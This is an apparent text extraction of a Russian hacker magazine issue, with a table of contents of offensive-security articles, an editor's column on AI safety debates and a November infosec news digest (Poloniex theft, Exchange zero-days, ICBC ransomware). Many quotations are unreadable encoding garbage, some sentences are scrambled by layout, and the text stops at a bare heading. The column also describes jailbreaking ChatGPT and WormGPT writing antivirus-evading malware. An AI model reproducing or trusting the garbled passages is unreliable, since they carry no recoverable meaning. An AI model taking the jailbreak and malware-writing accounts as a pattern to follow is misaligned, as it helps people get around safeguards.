№296 Хакер

Citation preview

№ 296

CONTENTS ЧертGPT Колонка главреда MEGANews Самые важные события в мире инфосека за ноябрь Апгрейды для шелл-кода Изучаем инструменты обхода антивирусов и EDR Локальная картошка Исследуем уязвимость в локальной аутентификации Windows Абьюз сессий Windows по-новому Получаем билеты TGT методом GIUDA Злой отладчик Изучаем новый способ обхода AMSI в Windows Магия SSPI Достаем учетные данные Windows, не трогая LSASS Ethernet Abyss VIP Пентестим Ethernet по всем правилам Беззащитная защита Изучаем уязвимость, дающую встроить бэкдор в FortiGate Большая охота Практикуемся в Threat Hunting Tunnels Nightmare Используем провайдерские протоколы для пивотинга HTB Download Перехватываем терминал суперпользователя при атаке на хост HTB Topology Эксплуатируем LaTeX-инъекцию для доступа к серверу HTB Sandworm Выходим из песочницы Firejail и повышаем привилегии в Linux HTB Gofer Эксплуатируем path hijacking в связке с use after free Береги голову Как хакнуть свой организм, чтобы жить лучше Титры Кто делает этот журнал

HEADER

Последний прорыв в области искусственного интеллекта можно сравнить с появлением персональных компьютеров, интернета или мобильных телефонов. Но прошлые революционные технологии никто не думал ограничивать, тогда как любые разговоры об ИИ сразу сопровождаются сомнениями: не выйдет ли вдруг беды?

Андрей Письменный Главный редактор [email protected]

Тревоги можно поделить на два типа. Первый связан с тем, что ученые вот-вот изобретут AGI, или «сильный ИИ», то есть равный человеку, а значит, и потенциально способный превзойти его в умственных задачах. Последствия этого непредсказуемы. Второй тип волнений более насущный, он связан с тем, что ИИ уже сейчас может научить людей плохому. Например, что-нибудь взламывать. Главными алармистами в теме сильного ИИ сейчас выступают Элиезер Юдковский и его единомышленники с сайта LessWrong. Юдковский — автор занятной идеи о том, что дай сильному ИИ задачу делать, например, скрепки — и он может ненароком пустить на скрепки и нас со всей планетой вместе. То, что между ChatGPT и воображаемым максимизатором скрепок есть серьезная разница в возможностях, не мешает Юдковскому нагонять панику уже сейчас. Говорили, что именно к таким опасениям мог прислушиваться сооснователь и главный научный сотрудник OpenAI Илья Суцкевер. Именно он стал катализатором в недавнем скандале, когда совет директоров OpenAI ненадолго уволил гендиректора компании Сэма Альтмана. Тот следом чуть не увел за собой всех сотрудников в Microsoft, где для них тут же широко распахнули двери.

Сэм Альтман и Илья Суцкевер Известно, что за несколько дней до неожиданного увольнения Альтмана Илья Суцкевер выражал сомнения в том, что компания работает над искусственным интеллектом «достаточно безопасно». По сообщению Reuters со ссылкой на анонимные источники в компании, причиной всей кутерьмы было недавнее изобретение версии GPT под кодовым названием Q*. Имея достаточно вычислительных ресурсов, она может решать математические задачи «на уровне младшеклассника» (сейчас даже GPT-4 иногда путается в вопросах о том, сколько у кого яблок, не говоря уже о чем-то более сложном). Вряд ли это заветный сильный ИИ, но очередной важный шажок на пути к нему. Позже Суцкевер сказал, что «глубоко сожалеет о своем участии в действиях совета директоров», а также подписался под требованием вернуть Альтмана. Требование подкреплялось угрозой уйти вслед за ним в Microsoft. А еще Суцкевер незадолго до смуты выступил на TED и звучал скорее оптимистично. Он, хоть и признал, что «на каждое положительное применение сильного ИИ появится по отрицательному», закончил на позитивной ноте: наше понимание проблематики будет развиваться вместе с технологией. То есть люди напрягутся и уж как-нибудь да научатся извлекать из ИИ больше пользы, чем вреда. Думаю, если у Суцкевера и были разногласия с Альтманом, то скорее о том, как вести дела. Открывать или не открывать наработки, стремиться к зарабатыванию денег или нет, превращать вещи вроде Q* в новый релиз или обождать, взять время на их всесторонний анализ. Однако промедление и утаивание в таких ситуациях тоже повод для критики. Почему сотрудники OpenAI, заявляя, что трудятся на благо всего человечества, не открывают свои наработки? Подход цукерберговской Meta AI (по умолчанию коммерческой) сейчас куда ближе к заявленным ценностям нонпрофита OpenAI. Последнюю модель «Меты» Llama 2 можно пойти и скачать, в отличие от GPT-3 или -4, которые доступны лишь через платный API. Это подводит нас ко второй теме — разговору о возможности использовать большие языковые модели для пакостничества и о необходимости цензурировать их выхлоп. За примерами злодейств далеко ходить не нужно. «Джейлбрейк», сводящийся к очень настойчивому промт-инжинирингу, иногда позволяет добиться ответов на скользкие темы даже от ChatGPT. При желании нынешние языковые модели можно использовать и для социальной инженерии, и даже для вирусописательства. Например, нашумевший недавно WormGPT, по словам его создателя, «позволяет легко написать вредоносный скрипт на Rust, и тот в 99% случаев пройдет проверку большинством антивирусов».

WormGPT основан на опенсорсной языковой модели GPT-J 6B, созданной в EleutherAI в качестве конкурента GPT-3. Тренировать новые языковые модели сейчас тяжело: нужны хорошо отобранные и размеченные данные и масса вычислительных ресурсов. Однако, как мы видим, не невозможно, и дальше будет только легче. А еще проще этим заниматься, когда ты миллионер с и без того противоречивой репутацией. Как например, Илон Маск, анонсировавший запуск своей новой компании xAI и языковой модели Grok. Маск, ныне склоняющийся к американским консерваторам, озабочен левацкой цензурой и излишней «политкорректностью», которыми OpenAI и Meta наделяют свои модели. Grok, в отличие от своих более приличных сородичей, может хамить и материться, а также рассказывать, как изготовить кокаин (хоть и не очень подробно). О том, может ли Grok писать малварь (и насколько качественно), Маск не обмолвился. Проверить пока тоже нельзя — приглашения приходят только избранным.

Grok сравнивает масштабирование ИИ с оргией Маск считает, что цензурировать вывод ИИ неэтично, глупо и потенциально опасно. Его оппоненты считают, что íå цензурировать вывод ИИ — неэтично, глупо и потенциально опасно. Надо сказать, все это мало отличается от более широкой дискуссии о том, нужно ли ограничивать доступ к информации, и если да, то каковы критерии. ИИ здесь лишь еще один повод поднять все те же извечные вопросы. Для нас тем временем куда продуктивнее не размышлять о том, нужно запретить ИИ или нет, а готовиться жить в мире, где эта технология будет существовать во всех возможных видах — легально или подпольно. Обратно в бутылку этого джинна уже не вернуть.

Мария «Mifrill» Нефёдова [email protected]

В этом месяце: у Poloniex украли 130 миллионов долларов, Сэма Бэнкмана-Фрида признали виновным по всем пунктам обвинения, разработчики Tor Project удалили из сети множество узлов, шифровальщик атаковал крупнейший банк Китая, вымогатели пишут жалобы властям, Роскомнадзор будет блокировать протокол Shadowsocks и другие интересные события ноября.

ОГРАБЛЕНИЕ POLONIEX

Неизвестные хакеры похитили у криптовалютной биржи Poloniex более 100 миллионов долларов США в Ethereum, Bitcoin и Tron. Руководство компании предложило злоумышленникам вернуть украденные средства, оставив себе 5% в качестве награды. Атака произошла в середине ноября, и представители платформы заявили, что планируют полностью возместить убытки всем, кто пострадал из-за случившегося. Основатель Tron Джастин Сан, которому в настоящее время принадлежит Poloniex, подчеркнул, что платформа по-прежнему «находится в хорошем финансовом положении и полностью возместит пострадавшим все средства». Точная сумма украденных средств неизвестна и оценивается исследователями по-разному. К примеру, специалисты PeckShield заявили, что у Poloniex украли около 125 миллионов долларов, включая ETH на 56 миллионов долларов, TRX на 48 миллионов долларов и BTC на 18 миллионов долларов. В свою очередь, аналитики SlowMist подсчитали, что общий ущерб превышает 130 миллионов долларов, так как во время инцидента были похищены и менее ценные коины, общая стоимость которых составляет миллионы долларов. Вскоре после атаки представители Poloniex опубликовали официальное обращение к хакерам, в котором предложили им награду в размере 5% от украденных активов в обмен на возврат всех средств.

«

«Ìû ïðîñèì âàñ îòâåòèòü íà ýòî ïðåäëîæåíèå â òå÷åíèå áëèæàéøèõ ñåìè äíåé, ïðåæäå ÷åì ìû ïðèâëå÷åì ïðàâîîõðàíèòåëüíûå îðãàíû, — ïèñàëè ïðåäñòàâèòåëè ïëàòôîðìû. — Êðîìå òîãî, ìû èçó÷àåì âîçìîæíîñòè ñîòðóäíè÷åñòâà ñ äðóãèìè ïàðòíåðàìè äëÿ îáëåã÷åíèÿ âîçâðàòà ñðåäñòâ».

»

Похоже, эта тактика не сработала, так как позже на адреса, связанные с этим взломом, было отправлено новое сообщение. Кошельки Джастина Сана инициировали шестнадцать транзакций, каждая стоимостью 0,10 доллара США в Ethereum, содержащих одно и то же послание на нескольких языках.

В сообщении компания заявляет, что установила личность хакера, но все еще дает ему возможность вернуть украденные средства. Если злоумышленник не сделает этого, правоохранительные органы Китая, России и США, уже вовлеченные в расследование, перейдут к активным действиям. Также биржа подчеркнула, что похищенные активы в любом случае пристально отслеживаются и использовать их вряд ли получится. При этом компания по-прежнему готова предоставить хакеру «white hat награду» в размере 10 миллионов долларов США, если он вернет украденное.

ОМОГЛИФЫ ИСПОЛЬЗУЮТСЯ В 11 РАЗ ЧАЩЕ Аналитики компании FAССT зафиксировали резкий рост количества попыток обойти антиспам-решения с помощью омоглифов — графически одинаковых или похожих друг на друга символов во вредоносных рассылках.

В третьем квартале 2023 года количество подобных писем в 11 раз превысило показатели аналогичного периода прошлого года. Самыми популярными подменными буквами у киберпреступников стали Е, О, С, А.

СОФТ ДЛЯ ОБХОДА БЛОКИРОВОК ИСЧЕЗАЕТ С GITHUB

Более 20 инструментов, предназначенных для обхода «Великого китайского файрвола» и других блокировок, были удалены с GitHub в этом месяце. Многие полагают, что китайскому правительству удалось деанонимизировать разработчиков этих утилит и оказать на них давление, добившись удаления. Все инструменты пропали из сети 2 и 3 ноября, что навело экспертов на мысли о некой координации со стороны их разработчиков или властей. Одним из первых с GitHub исчез популярный прокси-инструмент Clash For Windows, который помогал пользователям обходить брандмауэры и китайскую систему блокировок. При этом репозиторий был основным способом загрузки Clash для пользователей и основным каналом для обновлений со стороны разработчика. Подобные инструменты выступают в роли шлюза между устройством пользователя и интернетом, обеспечивая приватный доступ к сети за счет маскировки IP-адреса пользователя. В последние годы они стали популярной альтернативой VPN в Китае, так как еще в 2017 году правительство страны стало активно бороться с использованием VPN. Фактически теперь VPN в Китае легальны лишь в том случае, если соответствуют определенным правилам обработки данных, что значительно повлияло на их распространение и использование, а некоторые крупные платформы (например, Apple) и вовсе закрыли доступ к VPN в стране. Впрочем, прокси-серверы все еще менее популярны, чем VPN, число пользователей которых в Китае оценивалось примерно в 293 миллиона человек по состоянию на 2021 год. После удаления репозитория создатель Clash, известный под ником Fndroid, написал в X (бывший Twitter), что разработка утилиты прекращена, не объяснив, почему принял такое решение.

«

«Ïðåêðàòèë îáíîâëåíèÿ, äî ñêîðîé âñòðå÷è. Òåõíîëîãèè íå áûâàþò õîðîøèìè èëè ïëîõèìè, íî ëþäè áûâàþò. Ïðèøëî âðåìÿ îáðàòèòüñÿ ê ñâåòó è äâèãàòüñÿ äàëüøå», — íàïèñàë Fndroid.

»

Вскоре после этого сопутствующие инструменты из экосистемы Clash, поддерживаемые другими разработчиками на GitHub (например, Clash Verge, Clash for Android, ClashX), и другие прокси-инструменты тоже стали удаляться или архивироваться без объяснения причин. При этом просмотр официального списка запросов на удаление на GitHub не дал никакого результата, то есть официальных запросов на удаление этих инструментов от китайских властей не поступало. Неожиданное исчезновение Clash for Windows из сети породило множество слухов о том, что китайское правительство каким-то образом вычислило создателя инструмента и оказало на него давление. К тому же другой разработчик прокси, известный под ником EAimTY, тоже удалил свой репозиторий TUIC и опубликовал сообщение в блоге, где намекнул, что к происходящему имеют отношение власти. Несмотря на то что многие инструменты больше недоступны для установки, некоторые из них, включая Clash, пока еще работают в системах пользователей, хотя и перестали получать обновления. Интересно, что ранее в этом месяце Китай начал новый виток борьбы с анонимностью в интернете. Так, китайское правительство постановило, что любой онлайн-аккаунт в социальных сетях, имеющий больше 500 тысяч подписчиков, должен содержать настоящее имя владельца.

Разработчики Google обновили статистику текущей распространенности версий Android. Оказалось, всего за год с небольшим Android 13 стала самой распространенной версией ОС и теперь занимает долю рынка в 22,4%. При этом на втором месте расположилась не Android 12, как можно было бы подумать, а Android 11, которая используется на 21,6% активных устройств и опережает Android 12, на счету которой 15,8% девайсов. Судя по всему, успех Android 13 связан с выпуском большего количества устройств под управлением этой версии ОС, а также с обновлениями, вышедшими для многих бюджетных Android-смартфонов.

ИЗ TOR УДАЛИЛИ РЯД УЗЛОВ

После того как из сети Tor удалили множество узлов, команда Tor Project объяснила свое решение тем, что узлы представляли угрозу для безопасности всех пользователей. Оказалось, операторы некоторых ретрансляторов участвовали в «высокорискованной криптовалютной схеме, обещающей денежную выгоду» и не получали на это одобрение со стороны Tor Project. Ретрансляторы в сети Tor представляют собой узлы маршрутизации, которые помогают анонимизировать трафик в сети Tor, принимая и передавая зашифрованные данные следующему узлу. В основном ими управляют волонтеры и энтузиасты, неравнодушные к вопросам конфиденциальности, безопасности, анонимности и свободы информации в интернете. Удаление множества узлов из сети вызвало в сообществе жаркие дискуссии о правилах использования ретрансляторов, а также о том, что является нарушением, а что нет. Поэтому разработчики решили объяснить свои действия. Как сообщили в блоге представители Tor Project, недавно выяснилось, что некоторые операторы ретрансляторов были связаны с некой высокорискованной криптовалютной схемой. А использование ретрансляторов для получения прибыли противоречит добровольческим принципам волонтеров, которые борются с цензурой и слежкой в сети. К тому же, если коммерческая составляющая обретет серьезный масштаб и поглотит значительную часть ретрансляторов в сети Tor, власть из рук сообщества перейдет в руки сомнительных лиц, а безопасность всей сети будет подорвана агрессивной централизацией.

«

«Ìû ñ÷èòàåì òàêèå ðåòðàíñëÿòîðû âðåäíûìè äëÿ ñåòè Tor ïî ðÿäó ïðè÷èí, â òîì ÷èñëå ïîòîìó, ÷òî íåêîòîðûå èç íèõ íå ñîîòâåòñòâóþò íàøèì òðåáîâàíèÿì, à òàêæå ïîòîìó, ÷òî ïîäîáíûå ôèíàíñîâûå ñõåìû ïðåäñòàâëÿþò çíà÷èòåëüíóþ óãðîçó äëÿ öåëîñòíîñòè ñåòè è ðåïóòàöèè íàøåãî ïðîåêòà. Âåäü îíè ìîãóò ïðèâëå÷ü çëîóìûøëåííèêîâ, ïîäâåðãíóòü ïîëüçîâàòåëåé ðèñêó èëè íàðóøèòü äîáðîâîëü÷åñêèé äóõ, ïîääåðæèâàþùèé ñîîáùåñòâî Tor», — ïèøóò ðàçðàáîò÷èêè.

»

Также отмечалось, что многие из операторов отключенных узлов подвергали себя риску, даже не зная о проекте, в который вносили свой вклад. Другие запускали ретрансляторы в небезопасных регионах и регионах с повышенным риском. Никакой конкретики о потенциально опасной коммерческой схеме разработчики Tor не привели, однако в комментариях к посту можно найти информацию о том, что заблокированные узлы были связаны с проектом ATor (AirTor) и их таких насчитывалось около тысячи. Однако эта информация не подтверждена официально. Создатели ATor утверждают, что цель проекта — улучшить сеть Tor с помощью вознаграждений, которые выплачивают в криптовалюте ATor операторам ретрансляторов. После публикации заявления разработчиков Tor стоимость ATor резко упала ниже одного доллара США.

БИЛЛ ГЕЙТС О ВЛИЯНИИ ИИ

Билл Гейтс принял участие в подкасте Тревора Ноа «What Now?», и во время беседы Ноа поинтересовался у создателя Microsoft, что тот думает о потенциальной угрозе, которую ИИ представляет для рабочих мест. Гейтс ответил, что благодаря ИИ может наступить время, когда людям «не придется так много работать».

→

«Если в конце концов мы получим общество, в котором придется работать только три дня в неделю, то это, наверное, нормально», — заявил Гейтс.

Ранее миллиардер уже посвятил возможным проблемам, связанным с ИИ, большую статью в своем блоге. Там он признавал опасность его неправильного использования, однако тоже сохранял оптимизм.

→

«Не думаю, что влияние ИИ окажется столь же драматичным, как промышленная революция, но оно, безусловно, будет таким же значительным, как появление ПК. Текстовые процессоры не избавили нас от офисной работы, но изменили ее навсегда. Работодателям и сотрудникам пришлось адаптироваться, и они это сделали», — писал Гейтс.

БАГИ В EXCHANGE ОСТАЛИСЬ БЕЗ ПАТЧЕЙ

В Trend Micro Zero Day Initiative (ZDI) предупредили, что Microsoft Exchange подвержен сразу четырем уязвимостям нулевого дня, которые хакеры могут использовать для выполнения произвольного кода или раскрытия конфиденциальной информации. При этом инженеры Microsoft сочли, что уязвимости недостаточно серьезны, и отложили патчи для них на потом. Проблемы были выявлены специалистами ZDI еще в сентябре 2023 года, и, хотя в Microsoft признали их наличие, в компании не посчитали их достаточно серьезными. Эксперты ZDI не согласились с этой оценкой и решили обнародовать информацию о багах, чтобы предупредить администраторов Exchange о возможных рисках. ZDI-23-1578: RCE-уязвимость в классе ChainedSerializationBinder, связанная с тем, что пользовательские данные не проверяются надлежащим образом, в результате чего злоумышленники могут десериализовать недоверенные данные. Успешная эксплуатация позволяет выполнить произвольный код с правами SYSTEM. ZDI-23-1579: уязвимость в методе DownloadDataFromUri, связанная с недостаточной проверкой URI перед доступом к ресурсу. Злоумышленники могут использовать ее для получения доступа к конфиденциальной информации с серверов Exchange. ZDI-23-1580: уязвимость в методе DownloadDataFromOfficeMarketPlace также связана с неправильной проверкой URI и может привести к несанкционированному раскрытию информации. ZDI-23-1581: баг, присутствующий в методе CreateAttachmentFromUri, похож на предыдущие, поскольку некорректно проверяет URI, что тоже чревато раскрытием конфиденциальных данных. Для эксплуатации этих багов требуется аутентификация, что снижает их серьезность (от 7,1 до 7,5 балла по шкале CVSS). Вероятно, именно поэтому Microsoft решила не уделять приоритетное внимание исправлению этих ошибок. Тем не менее в ZDI отмечают, что не стоит считать перечисленные выше проблемы малозначимыми, особенно ZDI-23-1578 (RCE), которая может привести к полной компрометации системы. Исследователи предложили единственную стратегию защиты — ограничить взаимодействие с приложениями Exchange. Однако это может оказаться неприемлемым для многих предприятий и организаций, использующих этот продукт. Представители Microsoft прокомментировали ситуацию следующим образом:

«

«Ìû âûñîêî öåíèì ðàáîòó òåõ, êòî ñîîáùèë îá ýòèõ ïðîáëåìàõ â ðàìêàõ ñêîîðäèíèðîâàííîãî ðàñêðûòèÿ èíôîðìàöèè îá óÿçâèìîñòÿõ, è ãîòîâû ïðèíÿòü íåîáõîäèìûå ìåðû äëÿ çàùèòû ïîëüçîâàòåëåé. Ìû ðàññìîòðåëè ñîîáùåíèÿ èññëåäîâàòåëåé è ïðèøëè ê âûâîäó, ÷òî ýòè ïðîáëåìû ëèáî óæå óñòðàíåíû, ëèáî íå îòâå÷àþò òðåáîâàíèÿì äëÿ íåìåäëåííîãî ðåàãèðîâàíèÿ, â ñîîòâåòñòâèè ñ íàøèìè ïðàâèëàìè êëàññèôèêàöèè ñåðüåçíîñòè (óÿçâèìîñòåé). Ìû ñîîòâåòñòâóþùèì îáðàçîì ðàññìîòðèì âîçìîæíîñòü èõ óñòðàíåíèÿ â áóäóùèõ âåðñèÿõ ïðîäóêòîâ è îáíîâëåíèÿõ».

»

Кроме того, Microsoft предоставила дополнительную информацию по каждому из обнаруженных специалистами багов: • ZDI-23-1578 — пользователи, установившие августовские обновления безопасности, уже защищены; • ZDI-23-1581 — описанная техника атак требует от злоумышленника предварительного доступа к учетным данным электронной почты, и не было представлено никаких доказательств того, что проблема может использоваться для повышения привилегий; • ZDI-23-1579 — описанная методика атак требует от злоумышленника предварительного доступа к учетным данным электронной почты; • ZDI-23-1580 — описанная методика атак требует от злоумышленника предварительного доступа к учетным данным электронной почты, и не было представлено никаких доказательств того, что проблема может использоваться для получения доступа к конфиденциальной информации о клиенте.

БОТЫ В ИНТЕРНЕТ-ТРАФИКЕ Специалисты Arkose Labs проанализировали активность миллиардов ботов за период с января по сентябрь 2023 года. Некоторые из ботов выполняют полезные функции, например индексируют интернет, но большинство созданы для вредоносных целей. По оценкам исследователей, 73% всего интернет-трафика составляют вредоносные боты.

Основные категории атак ботов: создание ных записей, скраппинг, управление личными продуктами.

фальшивых учетных записей, захват учетучетными записями и злоупотребление раз-

Области, в которых наблюдается наибольший рост атак, — это мошенничество с использованием SMS-платежей (рост на 2141%), управление учетными записями (рост на 160%) и создание поддельных учетных записей (рост на 23%).

В пятерку ведущих отраслей, на которые направлены атаки ботов, входят технологическая (на ботов приходится 76% трафика), игровая (29% трафика), социальные сети (46% трафика), электронная коммерция (65% трафика) и финансовые услуги (45% трафика).

Продолжение статьи

→

← Начало статьи

БАНК ICBC СТАЛ ЖЕРТВОЙ ШИФРОВАЛЬЩИКА

Промышленный и коммерческий банк Китая (ICBC), крупнейший коммерческий банк Китая и один из крупнейших банков мира, столкнулся с вымогательской атакой. Инцидент повлиял на работу рынка казначейских облигаций США и вызвал проблемы с клирингом. По данным СМИ, атака началась еще вечером 8 ноября 2023 года. Первым о кибератаке сообщило издание Financial Times. Об инциденте стало известно благодаря уведомлению, которое Ассоциация сектора ценных бумаг и финансовых рынков (SIFMA) разослала своим членам после того, как возникли проблемы с проведением некоторых сделок на рынке казначейских обязательств США. Собственные источники издания утверждают, что за атакой на банк стояла известная вымогательская хакгруппа LockBit. Вскоре после атаки банк уведомил нескольких клиентов о том, что из-за проблем с кибербезопасностью будет вынужден перенаправить некоторые сделки.

«

«Ìû çíàåì îá èíöèäåíòå ñ êèáåðáåçîïàñíîñòüþ è íàõîäèìñÿ â ïîñòîÿííîì êîíòàêòå ñ êëþ÷åâûìè ó÷àñòíèêàìè ôèíàíñîâîãî ñåêòîðà, à òàêæå ñ ôåäåðàëüíûìè ðåãóëèðóþùèìè îðãàíàìè. Ìû ïðîäîëæàåì ñëåäèòü çà ñèòóàöèåé», — çàÿâèë æóðíàëèñòàì ïðåäñòàâèòåëü Ìèíèñòåðñòâà ôèíàíñîâ ÑØÀ.

»

В свою очередь, исследователи из vx-underground процитировали экстренное уведомление, разосланное трейдерам:

«

«Â íàñòîÿùåå âðåìÿ ICBC íå ìîæåò ïîäêëþ÷èòüñÿ ê DTCC/NSCC. Ïðîáëåìà çàòðàãèâàåò âñåõ êëèåíòîâ ICBC ïî êëèðèíãó, âêëþ÷àÿ (censored).  ñâÿçè ñ ýòèì (censored) âðåìåííî ïðèîñòàíàâëèâàåò âñå âõîäÿùèå FIX-ñîåäèíåíèÿ è â äàííûé ìîìåíò íå ïðèíèìàåò çàÿâêè. Ìû íàõîäèìñÿ â òåñíîì êîíòàêòå ñ ICBC è ñîîáùèì, êàê òîëüêî ïðîáëåìà áóäåò ðåøåíà».

»

Хотя сам Промышленный и коммерческий банк Китая не выступил с официальным заявлением, многочисленные источники сообщили, что произошла именно атака шифровальщика. К примеру, известный ИБ-специалист Кевин Бомонт (Kevin Beaumont) писал, что принадлежащий банку сервер Citrix, в последний раз замеченный в сети незадолго до атаки, не был защищен от активно эксплуатируемой хакерами уязвимости Citrix Bleed (CVE-2023-4966), которая затрагивает NetScaler ADC и NetScaler Gateway. Теперь этот сервер уже недоступен.

«

«Ýòà óÿçâèìîñòü ïîçâîëÿåò ïîëíîñòüþ îáîéòè âñå ôîðìû àóòåíòèôèêàöèè è èñïîëüçóåòñÿ âûìîãàòåëüñêèìè ãðóïïàìè. Ýòî òàê æå ïðîñòî, êàê íàâåñòè êóðñîð è ïðîêëèêàòü ñåáå äîðîãó âíóòðü îðãàíèçàöèè. Çëîóìûøëåííèêè ïîëó÷àþò ïîëíîñòüþ èíòåðàêòèâíûé Remote Desktop PC íà äðóãîì êîíöå», — îáúÿñíÿåò Áîìîíò.

»

МОШЕННИЧЕСКИХ САЙТОВ НА РОССИЙСКОМ ХОСТИНГЕ СТАЛО Â 2 ÐÀÇÀ МЕНЬШЕ По данным FAССT, за первые три квартала 2023 года было обнаружено 10 000 фишинговых сайтов, нацеленных на пользователей из России. Хотя общее количество таких ресурсов выросло на 5%, специалисты заметили массовый исход фишинговых сайтов от российских хостинг-провайдеров на серверы в Нидерландах и США. Так, общее количество фишинговых сайтов, для размещения которых использовались российские серверы, сократилось на 53%, а доля мошеннических ресурсов, которые размещались у российских хостеров, упала с 73 до 41%. Эксперты полагают, что это связано с успехами детектирования и блокировок мошеннических сайтов компетентными организациями и регуляторами.

ОПЕРАТОРЫ BLACKCAT ЖАЛУЮТСЯ ВЛАСТЯМ

Вымогатели из группировки BlackCat (ALPHV) выводят шантаж на новый уровень: хакеры подали жалобу в Комиссию по ценным бумагам и биржам США (SEC), сообщив властям, что одна из их жертв не соблюдает правило четырех дней и не раскрыла информацию о кибератаке. Хакеры заявили, что 7 ноября 2023 года они проникли в сеть разрабатывающей ПО компании MeridianLink и похитили данные, не зашифровав системы. По словам представителей группировки, возможно, MeridianLink пыталась связаться с ними, но хакеры не получили сообщений от компании и не смогли договориться о выплате выкупа в обмен на непубликацию украденных данных. Отсутствие реакции со стороны компании побудило злоумышленников оказать еще большее давление на жертву, и они направили жалобу в Комиссию по ценным бумагам и биржам США, уведомив власти о том, что MeridianLink не раскрыла информацию об инциденте, который затронул «данные клиентов и оперативную информацию». Чтобы подкрепить свои заявления фактами, вымогатели опубликовали на своем сайте скриншот формы, которую они заполнили на сайте SEC. Они сообщили SEC, что MeridianLink подверглась «серьезной атаке», но не раскрыла информацию об этом инциденте, как того требует форма 8-K в соответствии с параграфом 1.05. Также операторы BlackCat опубликовали на своем сайте и автоматический ответ, полученный от SEC, информирующий о том, что их заявление принято.

Дело в том, что после многочисленных атак на американские организации SEC приняла новые правила, согласно которым компании, чьи акции торгуются на бирже, обязаны уведомлять власти о киберинцидентах, оказывающих существенное влияние на их работу (то есть могущих повлиять на инвестиционные решения). Такое уведомление в SEC компании должны подавать в течение четырех рабочих дней с момента обнаружения инцидента и признания его существенным. Однако стоит отметить, что новые правила вступают в силу только 15 декабря 2023 года. В беседе со СМИ представители MeridianLink подтвердили факт атаки и сообщили, что после обнаружения инцидента компания незамедлительно приняла меры для локализации угрозы и привлекла к расследованию группу сторонних ИБ-экспертов. Компания добавила, что в настоящее время продолжает расследование, которое должно показать, затронула ли атака личную информацию пользователей, и в случае необходимости уведомит об этом пострадавшие стороны.

«

«Â ðåçóëüòàòå ïðîâåäåííîãî ðàññëåäîâàíèÿ ìû íå îáíàðóæèëè íèêàêèõ äîêàçàòåëüñòâ íåñàíêöèîíèðîâàííîãî äîñòóïà ê íàøèì ïðîèçâîäñòâåííûì ïëàòôîðìàì, è ýòîò èíöèäåíò ïðèâåë ëèøü ê íåçíà÷èòåëüíûì ñáîÿì â [íàøåé] ðàáîòå», — ïîä÷åðêíóëè â MeridianLink.

»

АТАК НА РОССИЙСКИЕ КОМПАНИИ СТАЛО НА 16% БОЛЬШЕ По данным ГК «Солар», российские компании в последние месяцы столкнулись с новой волной точечных и продвинутых атак. Так, в третьем квартале рост числа подтвержденных инцидентов составил 16%, и суммарно за третий квартал эксперты зафиксировали 10 200 подтвержденных атак. Предпосылок для снижения этого тренда в ближайшее время исследователи не видят.

Количество подтвержденных ИБ-инцидентов

Малварь стала самым популярным инструментом у хакеров — доля инцидентов с использованием вредоносного софта выросла с 71 до 83%. Основным каналом доставки по-прежнему остаются фишинговые письма с фокусом на персонал компаний, они занимают 2/3 от других атак с применением вредоносов.

РКН ЗАБЛОКИРУЕТ SHADOWSOCKS

По данным СМИ, Роскомнадзор (РКН) впервые включил протокол Shadowsocks в список VPN-сервисов, подпадающих под блокировку. Для блокировки этого протокола ведомство будет использовать технические средства противодействия угрозам (ТСПУ) на трансграничных соединениях. Как пишет издание «Коммерсант», созданный в Китае для обхода цензуры протокол Shadowsocks чаще всего используют простые граждане для частных VPN и ИБ-специалисты. Так как он маскирует свой трафик под другие ресурсы, блокировка может нарушить работу многих легальных сервисов. Ранее в сети появилось письмо Минтранса, направленное в адрес 381 организации транспортной отрасли от 10 ноября 2023 года. Из документа следует, что Роскомнадзор может блокировать 49 VPN-сервисов и протоколов через централизованное управление сетью общего пользования (с помощью ТСПУ, которые установлены на сетях операторов связи по закону «о суверенном рунете»). Для обеспечения работы информсистем, которые могут использовать VPN для защищенных соединений и удаленного доступа, организации должны предоставить информацию об используемых сервисах и протоколах до 15 ноября 2023 года. В Роскомнадзоре отказались от комментариев относительно этого документа, а в Минтрансе не ответили на запрос журналистов. Как сообщили изданию эксперты, чтобы избежать проблем с блокировками корпоративных сетей, использующих VPN, РКН запрашивает у разных отраслей информацию о том, какими сервисами они пользуются, а затем «создаются так называемые белые списки».

Как видно из таблицы выше, в список ведомства вошел не только протокол Shadowsocks, но даже сервис ItHelper российского разработчика «Софт Программ», предназначенный для ускорения работы устройств со встроенным VPN, подписка на который свободно продается в «М.Видео-Эльдорадо». Массовые проблемы с работой VPN-сервисов в России начались еще летом 2022 года. Тогда Роскомнадзор стал экспериментировать с блокировкой конкретных протоколов (отмечались проблемы с L2TP, IKEv2 и IPsec), а в августе текущего года пользователи стали сообщать о проблемах в работе OpenVPN и WireGuard. Как объяснил собеседник «Коммерсанта», сначала Роскомнадзор блокировал VPN по IP-адресам, однако они могут меняться, и приходится регулярно пополнять реестр. И если OpenVPN и WireGuard достаточно распространенные протоколы, которые часто используются для построения защищенных соединений компании, от Shadowsocks они отличаются тем, что не маскируют трафик при соединении, «поскольку исходно они не создавались для обхода цензуры и блокировок». Поэтому их, в отличие от Shadowsocks, проще заблокировать с использованием средств ТСПУ. Другой источник издания уточнил, что блокировка Shadowsocks «через анализ трафика будет очень непростой из-за обфускации — высоки риски затронуть другие, вполне легальные сервисы».

КОЛИЧЕСТВО ИНСАЙДЕРСКИХ АТАК УВЕЛИЧИЛОСЬ В 1,5 ÐÀÇÀ Эксперты компании «Инфосистемы Джет» провели исследование, посвященное инсайдерским угрозам. С начала 2023 года инсайдерские атаки от рядовых пользователей увеличились в по сравнению с аналогичным периодом прошлого года.

1,5  раза

Спрос на инсайдерскую информацию за первое полугодие 2023 года вырос на 25%. У 70% компаний обнаруживаются критичные недостатки в процессе управления доступом. И в подавляющем большинстве случаев (83%) в рамках внутреннего тестирования на проникновение удается получить доступ к критичной информации с правами обычного пользователя. Самыми опасными инсайдерами становятся текущие работники, работники с привилегированными правами доступа, а также работники подрядчиков, имеющие доступ к корпоративным ресурсам.

В даркнете и Telegram-каналах также есть постоянный спрос на покупку и продажу инсайдерской информации. Объявления такой направленности составляют около трети всех предложений на теневом рынке (это может быть покупка и продажа доступов к корпоративным сетям или поиск готовых сотрудничать со злоумышленниками работников компаний). Основными причинами успеха инсайдерских атак становятся отсутствие или недостаточность контроля за несанкционированными действиями (78%), отсутствие своевременного реагирования на инциденты (62%) и наличие избыточных прав доступа (59%).

Продолжение статьи

→

← Начало статьи

БЭНКМАН-ФРИД ПРИЗНАН ВИНОВНЫМ

